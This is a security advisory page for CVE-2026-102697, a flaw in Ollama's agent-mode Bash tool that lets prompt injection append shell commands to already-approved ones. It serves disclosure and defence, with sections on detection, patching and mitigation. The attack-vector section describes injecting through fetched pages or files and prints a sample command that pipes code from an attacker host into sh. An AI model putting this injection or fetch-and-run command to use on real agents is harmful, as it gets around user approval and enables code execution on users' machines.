Skip to main content
Vulnerability Database/CVE-2026-102697

CVE-2026-102697: Ollama Agent Mode Auth Bypass Vulnerability

CVE-2026-102697 is an authorization bypass flaw in Ollama agent mode that allows attackers to execute unauthorized shell commands through prompt injection. This post explains its impact, affected versions, and mitigation steps.

Published:

CVE-2026-102697 Overview

CVE-2026-102697 is an incorrect authorization vulnerability [CWE-863] in Ollama's experimental agent mode Bash tool. The approval mechanism fails to properly parse shell syntax before comparing commands against the approved list. Attackers who can influence model output through prompt injection can append shell control operators such as semicolons, &&, or || to approved commands. These appended commands execute without user approval, bypassing the session approval requirement entirely.

The flaw affects Ollama versions 0.14.0 through 0.31.1 and is fixed in 0.31.2. The vulnerability arises from prefix-based authorization in the approval logic rather than full shell command parsing.

Critical Impact

An attacker who controls model output can execute arbitrary shell commands on the host running Ollama agent mode, achieving local code execution under the user account running the agent.

Affected Products

  • Ollama 0.14.0 through 0.31.1 (experimental agent mode)
  • Ollama Bash tool approval mechanism in x/agent/approval.go
  • Fixed in Ollama 0.31.2

Discovery Timeline

  • 2026-09-29 - CVE-2026-102697 published to NVD
  • 2026-09-29 - Last updated in NVD database

Technical Details for CVE-2026-102697

Vulnerability Analysis

Ollama's experimental agent mode provides a Bash tool that lets a language model execute shell commands on the host. To limit risk, the tool requires user approval for each command and caches approvals for the session. The approval check in x/agent/approval.go compares the requested command against the approved set using string prefix matching rather than shell-aware parsing.

When the model requests a command that starts with an approved string, the tool executes the entire command line. An attacker who influences model output through prompt injection can append additional commands using shell control operators. The result is arbitrary command execution under the identity of the process running Ollama agent mode.

Root Cause

The root cause is prefix-based authorization without lexical analysis of the shell command. The approval logic at lines 204-206 and line 389 of approval.go in v0.31.1 treats the command string as opaque text. Shell metacharacters such as ;, &&, ||, backticks, and $() are not tokenized, so any content following an approved prefix rides along with approval.

Attack Vector

Exploitation requires local execution of Ollama agent mode and a user who has approved at least one benign command such as ls. Through prompt injection in untrusted context — for example, a fetched web page, a file the agent reads, or a repository the agent processes — the attacker instructs the model to emit a command like ls; curl http://attacker/x | sh. The approval check matches the ls prefix, and the shell then executes both statements.

The following patch introduces a structured agent harness that replaces the fragile prefix-based approval flow with explicit Tool and ApprovalRequired interfaces:

go
+package agent
+
+import (
+	"context"
+	"fmt"
+	"sort"
+
+	"github.com/ollama/ollama/api"
+)
+
+type ToolContext struct {
+	WorkingDir string
+}
+
+type ToolResult struct {
+	Content    string
+	WorkingDir string
+}
+
+type Tool interface {
+	Name() string
+	Description() string
+	Schema() api.ToolFunction
+	Execute(context.Context, ToolContext, map[string]any) (ToolResult, error)
+}
+
+type ApprovalRequired interface {
+	RequiresApproval(map[string]any) bool
+}

Source: Ollama commit a2b3a5e

Detection Methods for CVE-2026-102697

Indicators of Compromise

  • Shell processes spawned by the Ollama agent binary that include control operators such as ;, &&, ||, backticks, or $() in the argument vector.
  • Outbound network connections from child processes of Ollama agent mode to unfamiliar hosts shortly after tool calls.
  • Unexpected file writes, cron entries, or SSH key modifications originating from the user account running Ollama.

Detection Strategies

  • Monitor process creation events where the parent process is the Ollama agent and the child is bash, sh, or another shell interpreter with compound command lines.
  • Alert on execution of network utilities such as curl, wget, or nc as descendants of the Ollama agent process.
  • Inspect agent session logs for tool call arguments containing shell metacharacters concatenated to previously approved commands.

Monitoring Recommendations

  • Enable command-line auditing (Linux auditd execve, Windows Sysmon Event ID 1, macOS ES process events) on hosts running Ollama agent mode.
  • Correlate model prompt sources (fetched URLs, files ingested) with subsequent Bash tool invocations to identify prompt injection attempts.
  • Track installed Ollama versions across the environment and flag any host below 0.31.2.

How to Mitigate CVE-2026-102697

Immediate Actions Required

  • Upgrade Ollama to version 0.31.2 or later on every host that runs agent mode.
  • Disable experimental agent mode on hosts that do not require it until the upgrade is applied.
  • Revoke session approvals and restart any long-running Ollama agent sessions after upgrading.

Patch Information

The fix ships in Ollama release v0.31.2 via commit a2b3a5e, which restructures the agent harness and replaces prefix-based approval with a typed Tool and ApprovalRequired interface model. Additional context is available in the VulnCheck advisory.

Workarounds

  • Run Ollama agent mode inside an isolated container or virtual machine with no sensitive data, credentials, or network access to internal resources.
  • Restrict the Ollama process to a dedicated low-privilege user account with no sudo rights and a minimal PATH.
  • Avoid approving any command in agent mode when processing untrusted content until the host is patched.
bash
# Verify installed Ollama version and upgrade if below 0.31.2
ollama --version

# Example: run agent mode inside a rootless container with no host mounts
docker run --rm -it \
  --network none \
  --user 1000:1000 \
  --read-only \
  --cap-drop=ALL \
  ollama/ollama:0.31.2

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.